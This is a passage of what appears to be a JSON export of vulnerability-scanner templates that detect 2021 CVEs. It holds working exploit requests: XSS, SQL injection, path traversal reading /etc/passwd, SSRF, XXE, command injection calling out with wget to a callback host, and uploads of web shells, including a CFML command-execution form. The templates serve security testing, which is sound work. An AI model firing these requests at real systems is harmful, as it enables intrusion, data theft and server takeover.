Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\\&refurl=}}};alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain)//&et=ServerError","mail/bootr.ashx"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-40970","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[username]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25055","info":{"name":"WordPress FeedWordPress < 2022.0123 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21975","info":{"name":"vRealize Operations Manager API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /casa/nodes/thumbprints HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n[\"127.0.0.1:443/ui/\"]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["vRealize Operations Manager","thumbprint","address"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21307","info":{"name":"Lucee Admin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=a\n","POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=\n<cfoutput>\n\n<table>\n<form method=\"POST\" action=\"\">\n<tr><td>Command:</td><td><input type=test name=\"cmd\" size=50\n<cfif isdefined(\"form.cmd\")>value=\"#form.cmd#\"</cfif>><br></td></tr>\n<tr><td>Options:</td><td> <input type=text name=\"opts\" size=50\n<cfif isdefined(\"form.opts\")>value=\"#form.opts#\"</cfif>><br></td></tr>\n<tr><td>Timeout:</td><td> <input type=text name=\"timeout\" size=4\n<cfif isdefined(\"form.timeout\")>value=\"#form.timeout#\"\n<cfelse> value=\"5\"</cfif>></td></tr>\n</table>\n<input type=submit value=\"Exec\" >\n</form>\n<cfif isdefined(\"form.cmd\")>\n<cfsavecontent variable=\"myVar\">\n<cfexecute name = \"#Form.cmd#\"\narguments = \"#Form.opts#\"\ntimeout = \"#Form.timeout#\">\n</cfexecute>\n</cfsavecontent>\n<pre>\n","POST /lucee/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\ncmd=id&opts=&timeout=5\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-40438","info":{"name":"Apache <= 2.4.48 - Mod_Proxy SSRF","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?unix:{{repeat(\"A\", 7701)}}|http://{{interactsh-url}}"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-41649","info":{"name":"PuneethReddyHC Online Shopping System homeaction.php SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/homeaction.php"],"body":"cat_id=4'&get_seleted_Category=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22145","info":{"name":"Elasticsearch 7.10.0-7.13.3 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_bulk"],"body":"@\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root_cause","truncated","reason"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-28164","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41432","info":{"name":"FlatPress 1.2.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp\n\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"user\"\n\n{{username}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"pass\"\n\n{{password}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"submit\"\n\nLogin\n------WebKitFormBoundarykGJmx9vKsePrMkVp--\n","GET /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\n","POST /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd&timestamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish\n","GET /index.php/2022/10 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_4, '<p><script>alert(document.cookie)</script></p>')","contains(body_4, 'FlatPress')","contains(header_4, 'text/html')","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-39433","info":{"name":"BIQS IT Biqs-drive v1.83 Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21402","info":{"name":"Jellyfin <10.7.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/","{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/octet-stream"]},{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27314","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&password=test&submit=\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Doctor Appoinment System\")"],"condition":"and"}]}]},{"id":"CVE-2021-46073","info":{"name":"Vehicle Service Management System 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /vehicle_service/classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /vehicle_service/classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1\n","GET /vehicle_service/admin/?page=user/list HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script> Test</td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-40969","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[firstname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37538","info":{"name":"PrestaShop SmartBlog <4.0.6- SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c5fe25896e49ddfe996db7508cf00534"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21805","info":{"name":"Advantech R-SeeNet 2.4.12 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ping.php?hostname=|dir"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Ping |dir</title>","bottom.php"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43287","info":{"name":"Pre-Auth Takeover of Build Pipelines in GoCD","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24145","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"feed\"; filename=\"{{randstr}}.php\"\nContent-Type: text/csv\n\n<?php echo 'CVE-2021-24145'; ?>\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"mec-ix-action\"\n\nimport-start-bookings\n-----------------------------132370916641787807752589698875--\n","GET /wp-content/uploads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'CVE-2021-24145')"],"condition":"and"}]}]},{"id":"CVE-2021-26812","info":{"name":"Moodle Jitsi Meet 2.7-2.8.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(document.domain);"]},{"type":"word","part":"header","words":["MoodleSession"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31755","info":{"name":"Tenda Router AC11 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /goform/setmac HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/index.htmlr\nContent-Type: application/x-www-form-urlencoded\n\nmodule1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-24488","info":{"name":"WordPress Post Grid <2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\"onmouseover=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain)/\">","Post Grid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24340","info":{"name":"WordPress Statistics <13.0.8 - Blind SQL Injection","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nGET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"WP Statistics\")"],"condition":"and"},{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 500","contains(body_2, \">WordPress &rsaquo; Error<\") && contains(body_2, \">Your request is not valid.<\")"],"condition":"and"}]}]},{"id":"CVE-2021-44077","info":{"name":"Zoho ManageEngine ServiceDesk Plus - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/RestAPI/ImportTechnicians"],"matchers-condition":"and","matchers":[{"type":"word","words":["<form name=\"ImportTechnicians\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34473","info":{"name":"Exchange Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com","{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com"],"matchers":[{"type":"word","part":"body","words":["Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException","Exchange MAPI/HTTP Connectivity Endpoint"],"condition":"or"}]}]},{"id":"CVE-2021-29625","info":{"name":"Adminer <=4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25104","info":{"name":"WordPress Ocean Extra <1.9.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/?step=demo&page=owp_setup&a\"><script>alert(/XSS/)</script>   HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["OceanWP","><script>alert(/XSS/)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41282","info":{"name":"pfSense - Arbitrary File Write","severity":"high"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=\n","GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\\x3c\\x3fphp+var_dump(md5(\\x27CVE-2021-41282\\x27));unlink(__FILE__)\\x3b\\x3f\\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1\nHost: {{Hostname}}\n","GET /test.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(body, 'c3959e8a43f1b39b0d1255961685a238')","status_code==200"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["(sid:[a-z0-9,;:]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25281","info":{"name":"SaltStack Salt <3002.5 - Auth Bypass","severity":"critical"},"requests":[{"raw":["POST /run HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"client\":\"wheel_async\",\"fun\":\"pillar_roots.write\",\"data\":\"testing\",\"path\":\"../../../../../../../tmp/testing\",\"username\":\"1\",\"password\":\"1\",\"eauth\":\"pam\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["return","tag","jid","salt","wheel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42667","info":{"name":"Online Event Booking and Reservation System 2.3.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/?v=USER&ID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2Cmd5({{num}})%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%3B--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-1472","info":{"name":"Cisco Small Business RV Series - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nCookie: sessionid='`wget http://{{interactsh-url}}`'\nAuthorization: QUt6NkpTeTE6dmk4cW8=\nContent-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536\n\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"option\"\n\n5NW9Cw1J\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"destination\"\n\nJ0I5k131j2Ku\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file.path\"\n\nEKsmqqg0\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file\"; filename=\"config.xml\"\nContent-Type: application/xml\n\nqJ57CM9\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"filename\"\n\nJbYXJR74n.xml\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"GXbLINHYkFI\"\n\n<input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>\n-----------------------------392306610282184777655655237536--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["\"jsonrpc\":"]}]}]},{"id":"CVE-2021-31682","info":{"name":"WebCTRL OEM <= 6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","common/lvl5"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43062","info":{"name":"Fortinet FortiMail 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com<Svg%2Fonload%3Dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<Svg/onload=alert(document.domain)>","FortiMail Click Protection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21234","info":{"name":"Spring Boot Actuator Logview Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-41773","info":{"name":"Apache 2.4.49 - Path Traversal and Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-41773-POC"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-41648","info":{"name":"PuneethReddyHC action.php SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/action.php"],"body":"proId=1'&addToCart=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21972","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui/vropspluginui/rest/services/getstatus"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["VSPHERE-UI-JSESSIONID"],"condition":"and"},{"type":"regex","part":"body","regex":["(Install|Config) Final Progress"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31602","info":{"name":"Hitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js","{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<roleList>","<roles>Anonymous</roles>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24495","info":{"name":"Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>","{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><svg/onload=alert('{{randstr}}')>","alert(/{{randstr}}/)"],"condition":"or"},{"type":"word","words":["Marmoset Viewer"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39165","info":{"name":"Cachet <=2.3.18 - SQL Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))--"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"pagination\") && contains(body, \"data\")"],"condition":"and"}]}]},{"id":"CVE-2021-46422","info":{"name":"SDT-CW3B1 1.1.0 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<CmdResult>"]},{"type":"word","name":"http","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2021-41174","info":{"name":"Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Grafana","frontend_boot_js_done_time_seconds"],"condition":"and"},{"type":"regex","regex":["\"subTitle\":\"Grafana (v8\\.(?:(?:1|0)\\.[0-9]|2\\.[0-2]))"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"subTitle\":\"Grafana ([a-z0-9.]+)"]}]}]},{"id":"CVE-2021-27748","info":{"name":"IBM WebSphere HCL Digital Experience - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/docpicker/internal_proxy/http/oast.me","{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me"],"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40908","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=test'+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+'orQN'='orQN&password=test\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"incorrect\\\"\")"],"condition":"and"}]}]},{"id":"CVE-2021-27931","info":{"name":"LumisXP <10.0.0 - Blind XML External Entity Attack","severity":"critical"},"requests":[{"raw":["POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" ?>\n<!DOCTYPE r [\n<!ELEMENT r ANY >\n<!ENTITY xxe SYSTEM \"http://{{interactsh-url}}\">\n]>\n<method name=\"addPage\">\n<id>&xxe;</id>\n</method>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-40870","info":{"name":"Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /v1/backend1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=<?php echo md5(\"CVE-2021-40870\"); ?>\n","GET 